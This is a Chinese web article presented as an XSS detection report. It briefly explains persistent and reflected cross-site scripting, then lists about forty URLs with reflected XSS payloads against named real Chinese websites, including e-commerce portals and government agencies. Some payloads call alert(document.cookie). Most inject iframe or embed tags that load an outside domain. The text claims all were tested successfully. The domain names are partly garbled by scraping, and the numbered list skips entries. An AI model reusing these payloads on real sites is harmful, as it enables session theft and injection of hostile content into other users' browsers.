注:以下检测连接均在遨游浏览器测试成功。
对一个网页来讲,XSS就是在未经授权的情况下,向里面插入内容,因为未经授权所以
就是 漏洞 。
但大家更多的关注的不是授权,而是插入内容,这个内容经常带有危害性。
危害更多的是对访问这个页面的其他网民,你插入的代码,在我这儿运行,这些代码实
现很多东西。[在我这儿运行]意味着代码是有环境的,所以XSS必须立足于环境。是哪种情
况下的XSS,这才最关键。
一般将XSS分为持久性和非持久性,两者都有打开某个链接然后自动运行代码(恶意构
造的参数)的特点,持久型就是代码保存在服务端的数据库,像一个网站的用户名,自我介
绍,密码等如果不做过滤就会存在XSS,当我访问你的页面,因为你的名字是一段代码,所
以我承受了这段代码,同时也承受了这段代码可能带来的损失;非持久型就是一个链接,链
接里面有参数,是一段代码,我点了之后浏览器打开这个链接,链接指向的程序执行这段代
码参数,然后返回给我运行结果,执行实质是以向程序提供代码参数做触发,是即时的。
第一个:铭万 B2B http://search.b2b.cn/product/?k=%3cscript%3ealert(%27RC%27)%3c%2fscript%3e
第二个:凤凰网 http://my.ifeng测试数据/?c=friends&a=visit&ftype=6&friendName=%3C/title%3E%3Cscript%3Ealert(' RC')%3C/script%3E
第三个:中国电子网
http://search.21ic测试数据/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3E
第四个:中华能源网
http://HdhCmsTestpower-cn.cn/sample/search.asp?txtitle=<script>alert(document.cookie)</scr ipt>
第五个:21CN http://tags.21cn测试数据/tagsSearch?tags=%3Cscript%3Ealert()%3C/script%3E
第六个:中国知网
http://mall.cnki.net/magazine/articlesearch.aspx?keys=%3Ciframe%20src='http://HdhCmsTestchinaxiaoe测试数据'%3E%3C/iframe%3E
第七个:计算机世界
http://HdhCmsTestccw测试数据.cn/search/search_article.php?keyword=%3C%2Fspan%3E%3Cifra me+src%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E%3C%2Fiframe%3E
第八个:苏宁易购
http://HdhCmsTestsuning测试数据/emall/Search?searchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E
第九个:安博教育 HdhCmsTest2cto测试数据
http://HdhCmsTestmiiceic.org.cn/plus/search.php?keyword=%3Ciframe+src%3Dhttp%3A%2F %2FHdhCmsTestchinaxiaoe测试数据%3E%3Ciframe%3E
第十个:拍拍
网http://sse1.paipai测试数据/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338 kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
第十一个:源码天空
http://HdhCmsTestcodesky.net/article/search/?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+ src%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E%3C%2Fiframe%3E
第十二个:猫扑网
http://so.mop测试数据/s?q=%3C/title%3E%3Cembed%20src=Http://HdhCmsTestchinaxiaoe测试数据%3E%3C/em bed%3E
第十三个:瑞丽女性网
http://search.rayli测试数据.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http:// HdhCmsTestchinaxiaoe测试数据%3E%3C/embed%3E
第十四个:糯米网
http://HdhCmsTestnuomi测试数据/search?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F% 2FHdhCmsTestchinaxiaoe测试数据%3E%3C%2Fembed%3E
第十五个:中彩网
http://app.zhcw测试数据/wwwroot/zhcw/jsp/indexSearch.jsp?query=Random_Coder%3C%2 Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E&site=2&id=1
第十八个:太平洋网
http://ks.pconline测试数据.cn/index.jsp?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A% 2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第十九个:盘古搜索
http://news.panguso测试数据/newssearch.htm?orderType=1&q=%3C%2Ftitle%3E%3Cembe d+src%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十个:7K7K 游戏
http://so.7k7k测试数据/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2FHdhCmsTestchinaxiaoe测试数据%3E.htm
第二十一个:移动搜索 http://202.85.216.217/query?qt=%3C/title%3E%3Cembed%20src=http://HdhCmsTestchinaxiaoe测试数据%3E
第二十二个:19 楼
http://HdhCmsTest19lou测试数据/search/thread?keyword=%3C%2Ftitle%3E%3Cembed%20src%3 Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十三个:中国日报
http://search.chinadaily测试数据.cn/all_en.jsp?searchText=%22%3E%3Cembed+src%3Dhttp %3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十四个:电驴 下载
http://HdhCmsTestverycd测试数据/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3 A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十五个:天涯社区
http://search.tianya.cn/s?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十六个:华军软件园
http://search.newhua测试数据/search_list.php?searchname=%3C%2Ftitle%3E%3Cembed% 2F*%2Fsrc%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第二十八个:北斗手机网
http://mobile.139shop测试数据/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src= http://HdhCmsTestchinaxiaoe测试数据%3E_001_1.htm
第二十九个:appchina
http://HdhCmsTestappchina测试数据/market/berry/search.action?q=%3Cembed+src%3Dhttp%3A %2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第三十个:友人网
http://user.younet测试数据/search/default.php?search_phone=\%22/%3E%3Cembed%20src =http://HdhCmsTestchinaxiaoe测试数据%3E
第三十一个:麦包包
http://search.mbaobao测试数据/searcher?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A %2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第三十二个:中粮我买网
http://HdhCmsTestwomai测试数据/ProductList.htm?Keywords=%3C%2Ftitle%3E%3Cembed%2F* %2Fsrc%3Dhttp%3A%2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第三十三个:央广购物
http://HdhCmsTestcnrmall测试数据/tv/product/search. jsp ?key=%22/%3E%3Cembed%20src=http:/ /HdhCmsTestchinaxiaoe测试数据%3E
第三十四个:满座网
http://s.manzuo测试数据/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A% 2F%2FHdhCmsTestchinaxiaoe测试数据%3E
第三十五个:悠陶订餐网
http://HdhCmsTestutao365测试数据/search.php?encode=YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi O3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU%2bPGVtYmVkIHNyYz1odHRwOi8vdG1 4ay5 vc mc%2bIjtzOjEyOiJpbWFnZUZpZWxkX3giO3M6MjoiMTkiO3M6MTI6ImltYWdlRmllbG RfeSI7czoyOiIxMSI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEzMzQzNzQ5ODI7fQ= =
第三十六个:气象局: http://HdhCmsTestcma.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://HdhCmsTestchinaxiaoe测试数据%3E
第三十七个:交通部: http://search.moc.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://HdhCmsTestchinaxiaoe测试数据%3E 第三十八个:文化部: http://app.mcprc.gov.cn:9000/was40/search?channelid=56599&searchword=%3Ciframe %20src=http://HdhCmsTestchinaxiaoe测试数据%3E%3C/iframe%3E
第三十九个:中国人民银行: http://HdhCmsTestpbc.gov.cn:8080/dig/Default.jsp?q=%22/%3E%3Ciframe%20src=http://HdhCmsTestchinaxiaoe测试数据%3E/iframe%3E
第四十个:中国电信 http://search.chinatelecom测试数据.cn/was40/search?searchword=%3Ciframe//src=http://HdhCmsTestchinaxiaoe测试数据%3E%3C/iframe%3E
第四十一个:中国共青团 http://HdhCmsTestgqt.org.cn/was40/search?channelid=17472&searchword=%3Ciframe//src=ht tp://HdhCmsTestchinaxiaoe测试数据%3E%3C/iframe%3E
第四十二个:中央编译局 http://search.cctb.net:8081/utf8/search.jsp?channelid=76134&searchword=%3Ciframe// src=http://HdhCmsTestchinaxiaoe测试数据%3E%3C/iframe%3E
查看更多关于典型的XSS跨站脚本攻击安全检测报告 - 网站安的详细内容...